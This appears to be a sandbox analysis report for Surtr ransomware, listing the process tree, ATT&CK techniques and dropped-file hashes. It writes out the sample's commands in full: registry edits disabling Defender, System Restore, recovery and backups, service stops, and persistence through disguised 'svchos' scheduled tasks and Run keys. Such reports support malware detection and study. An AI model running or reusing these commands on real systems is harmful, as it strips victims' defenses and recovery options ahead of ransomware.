C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"2⤵
- Drops startup file
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"2⤵
- Drops startup file
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"2⤵
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\ProgramData\Service"3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"2⤵
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"2⤵
- Drops startup file
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "Antivirus"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Antivirus"2⤵
-
-
C:\Windows\system32\net.exenet stop "BackupExecDeviceMediaService"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecDeviceMediaService"2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSRS"1⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
1File Deletion
2Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5bc24259426b2a386da4530436bf3296e
SHA1a69b89882e9735ddc329faa719abdc4314f30adb
SHA256084431c01d52d58fd51bba58d44dc7f0942f0bcbb959749db131903f06410818
SHA5129759193a5baa1af795a0882709627e4704cf0a339777f1954d9b0d0ffb8fd4a82caab569f19a245a37caa1ead399831a8cf0fd8442048ad49a6ced307dcab25b
-
Filesize
614B
MD53edb25c3ee860ae35725913addc5ac52
SHA16040120e5cb599d01a29298c00d2ce40adaa7dd6
SHA256c54d52735ae6434b423b8e0f99e624b523ce404eea5c6f356593a9b616e76bc5
SHA5129b92cd7d21b5db2fa27d56bba9c27341c5836c9a796111b9483af61692edcd9f3ac45ead116d5e9ed82df29eec44e7ee3fdfede5405dabc8aea37baf726ff0c7
-
Filesize
14B
MD51761db4ca7cf70233fd9df40ec6e92c1
SHA1aeadc4f0ff1d69cad6d16ce43310715b76121418
SHA2566612fbe1b664ece9ead9aaa6d8702edea7f3cd4bc1505f4f669e07539973ac81
SHA51286b86b78e14e57ab607f177573d043577d86f91e5e02490137715add50a5da2c74140487c7969c976d18f069890e6ce5cf520f3fc2c3fead6a8c22a7c7ad0cfe
-
Filesize
1KB
MD5240742337ee5dafddc1a89952c017365
SHA10b0ee664192e8a6111c00b72d25e2491fe419567
SHA2566445e8b373a3fb3b32c7c83cb887a11a5c3d07e39e13a69be666415568a69fb3
SHA51253fb3b0c90287a6c35e2170a8452be0ab2694158663c13afc89f5853f06a801090328650a9a28736e0e75d51b95bcc5863c340637df2020294f39b81451d057b
-
Filesize
204B
MD59d932e747aba27b73fc3156cff66f880
SHA1128db23e16a7f72cde51e8aea86e506e8d934745
SHA2562b472fe1c757c3e5c46e85b84785a15028b7df0f937680fe42bffcdfb480fcbf
SHA5121c596f109cb5ee18d8fa406c412ddc536d9b2f5b3d554555215af3f92e3d7b54414186a211a509908a63d400817c3af457d61bb8d5a911464e72d504578bd622
-
Filesize
8KB
MD5bc24259426b2a386da4530436bf3296e
SHA1a69b89882e9735ddc329faa719abdc4314f30adb
SHA256084431c01d52d58fd51bba58d44dc7f0942f0bcbb959749db131903f06410818
SHA5129759193a5baa1af795a0882709627e4704cf0a339777f1954d9b0d0ffb8fd4a82caab569f19a245a37caa1ead399831a8cf0fd8442048ad49a6ced307dcab25b
-
Filesize
614B
MD53edb25c3ee860ae35725913addc5ac52
SHA16040120e5cb599d01a29298c00d2ce40adaa7dd6
SHA256c54d52735ae6434b423b8e0f99e624b523ce404eea5c6f356593a9b616e76bc5
SHA5129b92cd7d21b5db2fa27d56bba9c27341c5836c9a796111b9483af61692edcd9f3ac45ead116d5e9ed82df29eec44e7ee3fdfede5405dabc8aea37baf726ff0c7
-
Filesize
333KB
MD5393e9f112cc999ebd9333877bcc7535e
SHA1ed65581b6c3980b3ddf623a4d2f61ce08ce59bdf
SHA256459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712
SHA512021116a238f84e003ba6a5817b4d6ed27637ed6bc1d6d424533813d70964953c9deb1c62e94bae89db7c59f09dcc76ee5c92ad66c8e7688cd0d4643bc6d72c83
-
Filesize
1.4MB